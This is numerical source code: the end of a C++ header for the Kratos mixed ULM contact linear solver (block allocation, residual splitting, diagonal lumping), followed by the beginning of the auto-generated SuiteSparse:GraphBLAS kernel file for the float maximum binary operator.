Ptr[local_row_id + 1] = cols;
}
/**
* @brief This method is meant to avoid code duplication when computing the nonzero terms of the Aux1 matrix
* @details The same as the previous one but not taking into account the contribution of the other dofs
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The array storing the number of nonzero terms of each row
*/
inline void ComputeNonZeroColumnsPartialDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr
)
{
const IndexType row_begin = Index1[CurrentRow];
const IndexType row_end = Index1[CurrentRow + 1];
IndexType cols = 0;
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = Index2[j];
if (mWhichBlockType[col_index] == BlockType::MASTER) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
++cols;
}
}
Ptr[local_row_id + 1] = cols;
}
/**
* @brief This method is meant to avoid code duplication when evaluating the terms of the Aux1 matrix
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The array storing the number of nonzero terms of each row
* @param AuxIndex2 The indexes of the non zero columns
* @param AuxVals The values of the final matrix
*/
inline void ComputeAuxiliarValuesDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr,
IndexType* AuxIndex2,
double* AuxVals
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
// Auxiliar indexes
const SizeType other_dof_initial_index = 0;
const SizeType master_dof_initial_index = other_dof_size;
const SizeType slave_inactive_dof_initial_index = master_dof_initial_index + master_size;
const SizeType assembling_slave_dof_initial_index = slave_inactive_dof_initial_index + slave_inactive_size;
// Some indexes
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
const IndexType row_begin_A = Index1[CurrentRow];
const IndexType row_end_A = Index1[CurrentRow + 1];
const IndexType row_beg = Ptr[local_row_id];
IndexType row_end = row_beg;
for (IndexType j=row_begin_A; j<row_end_A; j++) {
const IndexType col_index = Index2[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
const double value = Values[j];
if (mWhichBlockType[col_index] == BlockType::OTHER) {
AuxIndex2[row_end] = local_col_id + other_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) {
AuxIndex2[row_end] = local_col_id + master_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
AuxIndex2[row_end] = local_col_id + slave_inactive_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
AuxIndex2[row_end] = local_col_id + assembling_slave_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
}
}
}
/**
* @brief This method is meant to avoid code duplication when evaluating the terms of the Aux1 matrix
* @details The same as the previous one but not taking into account the contribution of the other dofs
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The array storing the number of nonzero terms of each row
* @param AuxIndex2 The indexes of the non zero columns
* @param AuxVals The values of the final matrix
*/
inline void ComputeAuxiliarValuesPartialDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr,
IndexType* AuxIndex2,
double* AuxVals
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
// Auxiliar indexes
const SizeType master_dof_initial_index = other_dof_size;
const SizeType slave_inactive_dof_initial_index = master_dof_initial_index + master_size;
const SizeType assembling_slave_dof_initial_index = slave_inactive_dof_initial_index + slave_inactive_size;
// Some indexes
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
const IndexType row_begin_A = Index1[CurrentRow];
const IndexType row_end_A = Index1[CurrentRow + 1];
const IndexType row_beg = Ptr[local_row_id];
IndexType row_end = row_beg;
for (IndexType j=row_begin_A; j<row_end_A; j++) {
const IndexType col_index = Index2[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
const double value = Values[j];
if (mWhichBlockType[col_index] == BlockType::MASTER) {
AuxIndex2[row_end] = local_col_id + master_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
AuxIndex2[row_end] = local_col_id + slave_inactive_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
AuxIndex2[row_end] = local_col_id + assembling_slave_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
}
}
}
/**
* @brief It allocates all the blocks and operators
*/
inline void AllocateBlocks()
{
// We clear the matrixes
mKDispModified.clear(); /// The modified displacement block
mKLMAModified.clear(); /// The modified active LM block (diagonal)
mKLMIModified.clear(); /// The modified inactive LM block (diagonal)
mKSAN.clear(); /// The slave active-displacement block
mKSAM.clear(); /// The active slave-master block
mKSASI.clear(); /// The active slave-inactive slave block
mKSASA.clear(); /// The active slave-slave active block
mPOperator.clear(); /// The operator used for the master blocks
mCOperator.clear(); /// The operator used for the active slave block
mResidualLMActive.clear(); /// The residual corresponding to the active LM
mResidualLMInactive.clear(); /// The residual corresponding to the inactive LM
mResidualDisp.clear(); /// The residual of the displacements
mLMActive.clear(); /// The solution of the active LM
mLMInactive.clear(); /// The solution of the inactive LM
mDisp.clear(); /// The solution of the displacement
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType lm_inactive_size = mLMInactiveIndices.size();
const SizeType total_size = other_dof_size + master_size + slave_inactive_size + slave_active_size;
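// NOTE: total_size deliberately excludes the LM dofs: in the condensed system the active
// LM equations are assembled into the active slave positions (see FillBlockMatrices), so
// no additional rows are required for them.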
// We do the allocation
mKDispModified.resize(total_size, total_size, false); /// The modified displacement block
mKLMAModified.resize(lm_active_size, lm_active_size, false); /// The modified active LM block (diagonal)
mKLMAModified.reserve(lm_active_size);
mKLMIModified.resize(lm_inactive_size, lm_inactive_size, false); /// The modified inactive LM block (diagonal)
mKLMIModified.reserve(lm_inactive_size);
mKSAN.resize(slave_active_size, other_dof_size, false); /// The slave active-displacement block
mKSAM.resize(slave_active_size, master_size, false); /// The active slave-master block
mKSASI.resize(slave_active_size, slave_inactive_size, false); /// The active slave-inactive slave block
mKSASA.resize(slave_active_size, slave_active_size, false); /// The active slave-slave active block
mPOperator.resize(master_size, slave_active_size, false); /// The operator used for the master blocks
mCOperator.resize(lm_active_size, slave_active_size, false); /// The operator used for the active slave block
mResidualLMActive.resize(lm_active_size, false ); /// The residual corresponding to the active LM
mResidualLMInactive.resize(lm_inactive_size, false ); /// The residual corresponding to the inactive LM
mResidualDisp.resize(total_size ); /// The residual of the displacements
mLMActive.resize(lm_active_size, false); /// The solution of the active LM
mLMInactive.resize(lm_inactive_size, false); /// The solution of the inactive LM
mDisp.resize(total_size, false); /// The solution of the displacement
}
/**
* @brief This function extracts, from a vector with the size of the overall residual, the part that corresponds to the u-dofs
* @param rTotalResidual The total residual of the problem
* @param ResidualU The vector containing the residual relative to the displacements
*/
inline void GetUPart (
const VectorType& rTotalResidual,
VectorType& ResidualU
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType total_size = other_dof_size + master_size + slave_inactive_size + slave_active_size;
// Resize in case the size is not correct
if (ResidualU.size() != total_size )
ResidualU.resize (total_size, false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(other_dof_size); i++)
ResidualU[i] = rTotalResidual[mOtherIndices[i]];
// The corresponding residual for the active slave DoF's
VectorType aux_res_active_slave(slave_active_size);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_active_size); i++)
aux_res_active_slave[i] = rTotalResidual[mSlaveActiveIndices[i]];
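// With aux_res_active_slave (r_SA) extracted, the branches below assemble the condensed
// right hand side:
//   b_M  = r_M   - mPOperator * r_SA   (master rows)
//   b_SA = r_LMA - mCOperator * r_SA   (active slave rows, built from the active LM residual)
// mirroring the condensation applied to the matrix in FillBlockMatrices.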
if (slave_active_size > 0) {
// We compute the complementary residual for the master dofs
VectorType aux_complement_master_residual(master_size);
TSparseSpaceType::Mult(mPOperator, aux_res_active_slave, aux_complement_master_residual);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(master_size); i++)
ResidualU[other_dof_size + i] = rTotalResidual[mMasterIndices[i]] - aux_complement_master_residual[i];
} else {
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(master_size); i++)
ResidualU[other_dof_size + i] = rTotalResidual[mMasterIndices[i]];
}
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_inactive_size); i++)
ResidualU[other_dof_size + master_size + i] = rTotalResidual[mSlaveInactiveIndices[i]];
if (slave_active_size > 0) {
// We compute the complementary residual for the master dofs
VectorType aux_complement_active_lm_residual(lm_active_size);
TSparseSpaceType::Mult(mCOperator, aux_res_active_slave, aux_complement_active_lm_residual);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(lm_active_size); i++)
ResidualU[other_dof_size + master_size + slave_inactive_size + i] = rTotalResidual[mLMActiveIndices[i]] - aux_complement_active_lm_residual[i];
} else {
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(lm_active_size); i++)
ResidualU[other_dof_size + master_size + slave_inactive_size + i] = rTotalResidual[mLMActiveIndices[i]];
}
}
/**
* @brief This function extracts, from a vector with the size of the overall residual, the part that corresponds to the active lm-dofs
* @param rTotalResidual The total residual of the problem
* @param rResidualLMA The vector containing the residual relative to the active LM
*/
inline void GetLMAPart(
const VectorType& rTotalResidual,
VectorType& rResidualLMA
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
// Only meaningful when there are active slave dofs
if (slave_active_size > 0) {
// We get the displacement residual of the active slave nodes
if (rResidualLMA.size() != slave_active_size )
rResidualLMA.resize (slave_active_size, false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(rResidualLMA.size()); i++)
rResidualLMA[i] = rTotalResidual[mSlaveActiveIndices[i]];
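// The operations below evaluate, block by block,
//   rResidualLMA = r_SA - KSAN * u_N - KSAM * u_M - KSASI * u_SI - KSASA * u_SA
// i.e. the active slave displacement residual updated with the computed displacements.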
// From the computed displacements we get the components of the displacements for each block
VectorType disp_N(other_dof_size);
VectorType disp_M(master_size);
VectorType disp_SI(slave_inactive_size);
VectorType disp_SA(slave_active_size);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(other_dof_size); i++)
disp_N[i] = mDisp[i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(master_size); i++)
disp_M[i] = mDisp[other_dof_size + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_inactive_size); i++)
disp_SI[i] = mDisp[other_dof_size + master_size + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_active_size); i++)
disp_SA[i] = mDisp[other_dof_size + master_size + slave_inactive_size + i];
VectorType aux_mult(slave_active_size);
TSparseSpaceType::Mult(mKSAN, disp_N, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
TSparseSpaceType::Mult(mKSAM, disp_M, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
if (slave_inactive_size > 0) {
TSparseSpaceType::Mult(mKSASI, disp_SI, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
}
TSparseSpaceType::Mult(mKSASA, disp_SA, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
}
}
/**
* @brief This function extracts, from a vector with the size of the overall residual, the part that corresponds to the inactive lm-dofs
* @param rTotalResidual The total residual of the problem
* @param rResidualLMI The vector containing the residual relative to the inactive LM
*/
inline void GetLMIPart (
const VectorType& rTotalResidual,
VectorType& rResidualLMI
)
{
// Auxiliar size
const SizeType lm_inactive_size = mLMInactiveIndices.size();
// We get the residual of the inactive LM dofs
if (rResidualLMI.size() != lm_inactive_size )
rResidualLMI.resize (lm_inactive_size, false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(lm_inactive_size); i++)
rResidualLMI[i] = rTotalResidual[mLMInactiveIndices[i]];
}
/**
* @brief This method writes the displacement part
* @param rTotalResidual The total residual of the problem
* @param ResidualU The vector containing the residual relative to the displacements
*/
inline void SetUPart (
VectorType& rTotalResidual,
const VectorType& ResidualU
)
{
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mOtherIndices.size()); i++)
rTotalResidual[mOtherIndices[i]] = ResidualU[i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mMasterIndices.size()); i++)
rTotalResidual[mMasterIndices[i]] = ResidualU[mOtherIndices.size() + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mSlaveInactiveIndices.size()); i++)
rTotalResidual[mSlaveInactiveIndices[i]] = ResidualU[mOtherIndices.size() + mMasterIndices.size() + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mSlaveActiveIndices.size()); i++)
rTotalResidual[mSlaveActiveIndices[i]] = ResidualU[mOtherIndices.size() + mMasterIndices.size() + mSlaveInactiveIndices.size() + i];
}
/**
* @brief This method writes the active Lagrange Multiplier part
* @param rTotalResidual The total residual of the problem
* @param ResidualLMA The vector containing the residual relative to the active LM
*/
inline void SetLMAPart (
VectorType& rTotalResidual,
const VectorType& ResidualLMA
)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(ResidualLMA.size()); i++)
rTotalResidual[mLMActiveIndices[i]] = ResidualLMA[i];
}
/**
* @brief This method writes the inactive Lagrange Multiplier part
* @param rTotalResidual The total residual of the problem
* @param ResidualLMI The vector containing the residual relative to the inactive LM
*/
inline void SetLMIPart (
VectorType& rTotalResidual,
const VectorType& ResidualLMI
)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(ResidualLMI.size()); i++)
rTotalResidual[mLMInactiveIndices[i]] = ResidualLMI[i];
}
/**
* @brief This method is used to ensure that the matrix is structurally symmetric
* @param rA The matrix to be checked
*/
void EnsureStructuralSymmetryMatrix (SparseMatrixType& rA)
{
// We compute the transposed matrix
const SizeType size_system_1 = rA.size1();
const SizeType size_system_2 = rA.size2();
SparseMatrixType transpose(size_system_2, size_system_1);
SparseMatrixMultiplicationUtility::TransposeMatrix<SparseMatrixType, SparseMatrixType>(transpose, rA, 0.0);
// Finally we sum the auxiliar matrices
SparseMatrixMultiplicationUtility::MatrixAdd<SparseMatrixType, SparseMatrixType>(rA, transpose, 1.0);
}
/**
* @brief This method is used to check the consistency of the given matrix
* @param rA The matrix to be checked
* @return The Frobenius norm of the matrix
*/
double CheckMatrix (const SparseMatrixType& rA)
{
// Get access to A data
const std::size_t* index1 = rA.index1_data().begin();
const std::size_t* index2 = rA.index2_data().begin();
const double* values = rA.value_data().begin();
double norm = 0.0;
for (std::size_t i=0; i<rA.size1(); ++i) {
std::size_t row_begin = index1[i];
std::size_t row_end = index1[i+1];
if (row_end - row_begin == 0)
KRATOS_WARNING("Checking sparse matrix") << "Line " << i << " has no elements" << std::endl;
for (std::size_t j=row_begin; j<row_end; j++) {
KRATOS_ERROR_IF( index2[j] > rA.size2() ) << "Array above size of A" << std::endl;
norm += values[j]*values[j];
}
}
return std::sqrt (norm);
}
/**
* @brief This method is designed to create the final solution sparse matrix from the auxiliar values
* @details Before creating it, the columns are reordered. The auxiliar arrays are deleted once the matrix is computed
* @param AuxK The matrix solution
* @param NRows The number of rows of the matrix
* @param NCols The number of columns of the matrix
* @param Ptr The indexes that indicate the number of nonzero values in each row
* @param AuxIndex2 The indexes of the nonzero columns
* @param AuxVal The array containing the values of the sparse matrix
*/
void CreateMatrix(
SparseMatrixType& AuxK,
const SizeType NRows,
const SizeType NCols,
IndexType* Ptr,
IndexType* AuxIndex2,
double* AuxVal
)
{
// We reorder the rows
SparseMatrixMultiplicationUtility::SortRows(Ptr, NRows, NCols, AuxIndex2, AuxVal);
// Finally we build the final matrix
SparseMatrixMultiplicationUtility::CreateSolutionMatrix(AuxK, NRows, NCols, Ptr, AuxIndex2, AuxVal);
// Release memory
delete[] Ptr;
delete[] AuxIndex2;
delete[] AuxVal;
}
/**
* @brief This method is intended to lump an existing matrix
* @param rA The matrix to be lumped
* @param rdiagA The resulting matrix
* @param Tolerance The tolerance considered to check if the values are almost 0
* @todo Improve the lumping in the case of a non purely diagonal matrix
*/
void ComputeDiagonalByLumping (
const SparseMatrixType& rA,
SparseMatrixType& rdiagA,
const double Tolerance = ZeroTolerance
)
{
// Aux values
const std::size_t size_A = rA.size1();
// VectorType diagA_vector(size_A);
//
// // In case of not pure lumped matrix
// if (rA.nnz() > size_A) {
// // Get access to A data
// const std::size_t* index1 = rA.index1_data().begin();
// const double* values = rA.value_data().begin();
//
// #pragma omp parallel for
// for (int i=0; i< static_cast<int>(size_A); i++) {
// const std::size_t row_begin = index1[i];
// const std::size_t row_end = index1[i+1];
// double temp = 0.0;
// for (std::size_t j=row_begin; j<row_end; j++)
// temp += values[j]*values[j];
//
// diagA_vector[i] = std::sqrt(temp);
// }
// } else { // Otherwise
// #pragma omp parallel for
// for (int i=0; i< static_cast<int>(size_A); i++) {
// diagA_vector[i] = rA(i, i);
// }
// }
IndexType* ptr = new IndexType[size_A + 1];
ptr[0] = 0;
IndexType* aux_index2 = new IndexType[size_A];
double* aux_val = new double[size_A];
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(size_A); i++) {
ptr[i+1] = i+1;
aux_index2[i] = i;
const double value = rA(i, i);
// const double value = diagA_vector[i];
if (std::abs(value) > Tolerance)
aux_val[i] = 1.0/value;
else // Auxiliar value
aux_val[i] = 1.0;
}
SparseMatrixMultiplicationUtility::CreateSolutionMatrix(rdiagA, size_A, size_A, ptr, aux_index2, aux_val);
delete[] ptr;
delete[] aux_index2;
delete[] aux_val;
}
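// Sketch of the effect on a hypothetical input (values for illustration only):
// rA = diag(4.0, 0.0) with the default tolerance yields rdiagA = diag(0.25, 1.0),
// i.e. every diagonal entry is inverted and (near-)zero entries are replaced by the
// placeholder value 1.0.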
/**
* @brief Checks if the degree of freedom belongs to a displacement DoF
* @param rDoF The degree of freedom
* @return True if the DoF corresponds with a displacement dof
*/
static inline bool IsDisplacementDof(const DofType& rDoF)
{
const auto& r_variable = rDoF.GetVariable();
if (r_variable == DISPLACEMENT_X ||
r_variable == DISPLACEMENT_Y ||
r_variable == DISPLACEMENT_Z) {
return true;
}
return false;
}
/**
* @brief Checks if the degree of freedom belongs to a LM DoF
* @param rDoF The degree of freedom
* @return True if the DoF corresponds with a LM dof
*/
static inline bool IsLMDof(const DofType& rDoF)
{
const auto& r_variable = rDoF.GetVariable();
if (r_variable == VECTOR_LAGRANGE_MULTIPLIER_X ||
r_variable == VECTOR_LAGRANGE_MULTIPLIER_Y ||
r_variable == VECTOR_LAGRANGE_MULTIPLIER_Z) {
return true;
}
return false;
}
/**
* @brief This method returns the default parameters in order to avoid code duplication
* @return Returns the default parameters
*/
Parameters GetDefaultParameters()
{
Parameters default_parameters( R"(
{
"solver_type" : "mixed_ulm_linear_solver",
"tolerance" : 1.0e-6,
"max_iteration_number" : 200,
"echo_level" : 0
} )" );
return default_parameters;
}
///@}
///@name Private Access
///@{
///@}
///@name Private Inquiry
///@{
///@}
///@name Un accessible methods
///@{
///@}
}; // Class MixedULMLinearSolver
///@}
///@name Type Definitions
///@{
// Here one should use the KRATOS_CREATE_LOCAL_FLAG, but it does not play nice with template parameters
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
const Kratos::Flags MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>::BLOCKS_ARE_ALLOCATED(Kratos::Flags::Create(0));
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
const Kratos::Flags MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>::IS_INITIALIZED(Kratos::Flags::Create(1));
///@}
///@name Input and output
///@{
/// input stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::istream& operator >> (std::istream& IStream,
MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
return IStream;
}
/// output stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::ostream& operator << (std::ostream& rOStream,
const MixedULMLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
rThis.PrintInfo (rOStream);
rOStream << std::endl;
rThis.PrintData (rOStream);
return rOStream;
}
///@}
} // namespace Kratos.
#endif // KRATOS_MIXEDULM_SOLVER_H_INCLUDED defined
|
GB_binop__max_fp32.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_01__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_02__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_03__max_fp32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__max_fp32)
// A*D function (colscale): GB (_AxD__max_fp32)
// D*A function (rowscale): GB (_DxB__max_fp32)
// C+=B function (dense accum): GB (_Cdense_accumB__max_fp32)
// C+=b function (dense accum): GB (_Cdense_accumb__max_fp32)
// C+=A+B function (dense ewise3): GB (_Cdense_ewise3_accum__max_fp32)
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__max_fp32)
// C=scalar+B GB (_bind1st__max_fp32)
// C=scalar+B' GB (_bind1st_tran__max_fp32)
// C=A+scalar GB (_bind2nd__max_fp32)
// C=A'+scalar GB (_bind2nd_tran__max_fp32)
// C type: float
// A type: float
// B,b type: float
// BinaryOp: cij = fmaxf (aij, bij)
#define GB_ATYPE \
float
#define GB_BTYPE \
float
#define GB_CTYPE \
float
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
float aij = GBX (Ax, pA, A_iso)
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
float bij = GBX (Bx, pB, B_iso)
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
float t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = fmaxf (x, y) ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_MAX || GxB_NO_FP32 || GxB_NO_MAX_FP32)
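// Illustrative sketch (not generated code): inside the templates included
// below, the macros above compose roughly as follows for each entry p,
// assuming a dense, non-iso layout:
//
//     GB_GETA (aij, Ax, p, false) ;          // float aij = GBX (Ax, p, false)
//     GB_GETB (bij, Bx, p, false) ;          // float bij = GBX (Bx, p, false)
//     GB_BINOP (GB_CX (p), aij, bij, 0, 0) ; // Cx [p] = fmaxf (aij, bij)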
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB (_Cdense_ewise3_accum__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__max_fp32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type float
float bwork = (*((float *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__max_fp32)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__max_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_01__max_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_01_meta.c"
return (GrB_SUCCESS) ;
#endif
}
